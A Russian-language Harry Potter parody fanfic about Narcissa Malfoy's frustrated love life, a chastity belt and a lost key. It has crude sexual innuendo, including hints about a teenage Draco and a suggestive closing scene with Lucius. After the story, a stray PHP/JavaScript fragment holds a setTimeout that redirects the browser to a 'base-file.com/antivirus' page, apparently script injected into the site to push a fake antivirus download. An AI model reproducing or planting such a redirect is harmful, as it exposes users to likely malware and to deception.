Золотой ключик

Автор: Нюшка
Рейтинг: PG-13
Жанр: стёб
Краткое содержание: несчастная жизнь озабоченной Нарциссы Малфой.
Дисклеймер: герои принадлежат Дж.К. Ролинг. И слава Мерлину. Пусть сама с ними мучается. А денег я на этом точно не заработаю. Ах, да на Буратино тоже совершенно не претендую.
Примечание: Намекнула, на всё что можно было намекнуть.

Нарцисса Малфой с трагическим выражением лица разглядывала себя в зеркало.

Хороша? Да что там! Не просто хороша, а убийственно красива. Она гибко изогнулась, осматривая обтянутую нежным голубым шелком пеньюара стройную спину. Холеные руки с длинными белыми пальцами скользнули по теплым гладким бокам и бедрам. Потом огромные синие глаза налились слезами, нежные розовые губки задрожали. Милая леди, мгновенно превратившись в разъяренную фурию, с размаху швырнула массивную хрустальную пепельницу в свое отражение. Пепельница разбилась с обиженным звоном. Зеркало - нет. Люциус, этот ублюдок, позаботился. Поставил не бьющееся.

Нарцисса рухнула на кровать. Слезы уже готовились потечь по персиковым щекам. Нет. Этого нельзя допустить. Новая суперстойкая тушь обладала несколько странным эффектом. В прошлый раз, когда она не смогла остановить водопад слез, тушь не задержавшись на ресницах, потекла по щекам, и тут уж полностью доказала свою стойкость. Три дня Нарцисса с изуродованными темными потеками лицом не могла даже носа высунуть из комнаты. И дама решила сменить слезы на гнев. А на кого ей гневаться, как не на собственного муженька?

Можно, конечно, еще на сыночка, но с этим тяжелее. Уже несколько месяцев она преданно ходит к психоаналитику, который наставляет ее, как любить своего ребенка. И, конечно же, в ее визитах не играет совершенно никакой роли тот факт, что чертов шринк (1) похож на молодого Алана Рикмана. О, Нарцисса была прекрасно знакома с маггловским кино. Конечно, Люциус не одобрял… Но кому есть дело до того, что одобряет, и что не одобряет Люциус.

Визиты к психоаналитику давали ей возможность красиво одеться, накраситься, а потом сидеть в кресле перед обалденным мужиком и пялиться на его подтянутую фигуру. Конечно, кое-что из того, чем он ее грузил, она все же воспринимала . Вот, например: "Если вам тяжело любить своего взрослого сына и у вас конфликты, вы должны представить его себе маленьким. Младенцем с розовой попочкой и пяточками, которые вы так любили целовать".

Ага, тот самый случай. Эти самые попочку и пяточки она и видела-то всего два раза в жизни. Таковы особенности родов и воспитания детей у высокопоставленных колдуний. Пара заклинаний, и она засыпает на несколько часов. А потом ей приносят уже чистенького и упакованного наследничка. Ну, заходила она, конечно, иногда в детскую, хотя домовые эльфы и не одобряли ее порывов. Но такое бывало только до того случая, когда она, наконец, полюбовалась на попочку. Голенький Драко лежал на пеленальном столике, вокруг него хлопотали домовые эльфы, и Нарцисса проявила любопытство. Ее рука даже потянулась к этим самым пяточкам, такие они были умилительные, крохотулечные и розовенькие. А потом маленький поганец описал ее новое, ужасно дорогое вечернее платье, и ей пришлось принимать гостей в прошлогоднем. Сука Паркинсон, конечно, заметила и не преминула съязвить.

Второй раз на попочку Нарцисса полюбовалось, когда без стука зашла в комнату обожаемого отпрыска. Пяточек, правда, она не видела. Истинный сыночек своего папаши даже не снял носки. Зато она прекрасно рассмотрела розовый зад Драко и ляжки лежащей под ним горничной. И знаете, что он сказал? Послушный сын только рявкнул:

- Стучать надо, - и продолжил заниматься делом не обращая на нее больше никакого внимания.

Никто, никто не обращал на нее внимания. Взгляд Нарциссы снова упал на зеркало. Предательское стекло отразило ее очаровательное лицо и совершенное тело. Никаких признаков возраста! И это все пропадает зря!

Конечно, она прекрасно знала, зачем вышла замуж за Малфоя. Еще бы ей не знать. Деньги и знатный род. Страшная тайна Нарциссы была в том, что она вовсе не из такой уж древней семьи. То есть, конечно, чистокровной и все такое, но совершенно не настолько знатной, что бы кому-то из ее членов удалось породниться с Малфоями. Но Люциус Малфой никогда не мог держать штаны застегнутыми и имел прекрасно подвешенный язык, годящийся для многих потрясающих вещей. Одна из которых заключалось в том, что он просто убийственно умел очаровывать молоденьких дурочек. Через несколько минут общения девушке начинало казаться, что она единственная и неповторимая, и именно она может спасти Люциуса, вытащить его из омута разврата. Так они все и ловились. Но в лице Нарциссы милашка Люц нарвался на равного противника. Одна прекрасная романтическая ночь, потом трагическое расставание и слова Люциуса: "Дорогая, я тебя не достоин. Тебе будет гораздо лучше без меня".
Потом оставалось только пару месячишек подождать и предстать перед старшим Малфоем, кошмарным папочкой Люца. Невинные синие глаза, наполненные слезами, искусанные пухленькие губы. Хм. Ну и, конечно, глубокое как море декольте:

"Дорогой мистер Малфой, скоро Вы станете дедушкой".

Надо сказать, что Люциус жениться совершенно не хотел. Но тяжелая трость папочки, в паре с высокомерным изречением "Малфои не плодят ублюдков" сыграли свою роль. И вот она уже шестнадцать лет как миссис Малфой. Но стоила ли овчинка выделки?

После первой брачной ночи Люциус удостаивал ее своим вниманием крайне редко. И чаще всего бывал во время этих визитов нетрезв.

Нет. Нужно срочно заводить любовника. Вот только кого? В Министерстве и обществе вряд ли найдется идиот, который решится пойти против Люциуса Малфоя. Этот вариант можно оставить. Вот Хогварц, совсем другое дело. Именно там ухватятся обеими руками за идею наставить рога зануде Люцу. Но кто?
Флитвик? Что там говорят о маленьких мужчинах: маленький гигант большого секса? Может и подойдет. Или Снейп? Что там говорят о мужчинах с большими носами? О, да, этот ей тоже подойдет. Или Хагрид? Что там говорят о мужчинах с густыми бровями? Филч? Нарцисса дернулась. Это до какой же глубины отчаяния надо дойти, что бы польститься на…это.

И тут Нарцисса опять чуть не разрыдалась.

Кроме проблемы выбора перед ней стояла и чисто техническая проблема. Мерзавец Малфой придумал новую игру. Этот…. О, Мерлин, как бы его еще обозвать…. В общем, придется сказать просто: Люциус Малфой надел на Нарциссу пояс верности. И всю глубину катастрофы она осознала только тогда, когда муж вернулся из поездки под ручку с молоденькой проституткой мужского пола и без изящного, золотого с мелкими бриллиантами, ключика. ОН ЕГО ПОТЕРЯЛ!!!

Что уж тут скажешь. Теперь ей надо было выбирать любовника не по достоинствам, расположенным ниже пояса, а по магическим талантам. Потому что Люциус Малфой, один из самых сильных колдунов мира, не доверился, конечно, только замочку, а еще и запечатал мерзопакостную вещицу заклятием. А кто может снять заклятие, наложенное Люцем?

Флитвик? Заклятие-то он может и снимет, но ему не справится с замком.

Хагрид? Замок он может просто поломать, а вот с магией будут проблемы.

Вот и оставались только Дамблдор, Вольдеморт, Снейп и … Люциус Малфой.

Люциус по понятным причинам не обсуждался.

Дамблдор был стар, слишком стар, просто супер стар.

Вольдеморт открыто предпочитал мальчиков, к тому же у Нарциссы была аллергия на красный цвет.

Снейп. О, она бы предпочла Снейпа. Она слышала о его неуемном сексуальном аппетите. Слышала что-то о девочках, о мальчиках, о мужчинах, магах и магглах, о змеях и даже о собаках.

И единственное, о чем она никогда не слышала, так это о женщинах за тридцать. У нее здесь просто не было шансов! Слезы отказались задерживаться в слезных протоках и полились по щекам. Взгляд в зеркало подтвердил худшие опасения Нарциссы: ее персиковые щеки пересекали темные дорожки потекшей туши.
И Нарцисса Малфой взвыла совсем уж нечеловеческим голосом.

На втором этаже имения Люциус Малфой с довольным видом прислушивался к стенаниям жены. Его длинные белые аристократические пальцы с невыразимой нежностью поглаживали тугой задик лежащего рядом спящего молодого человека.
О, такая узенькая щель в полу, такие нерадивые домовые эльфы и такой крохотный ключик… Совершенное, идеальное сочетание. Люциус улыбнулся и решил, что пора будить Драко.

(1) Шринк - если я не ошибаюсь, жаргонное название психотерапевта. Правда, в Штатах, но простите мне эту вольность.

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>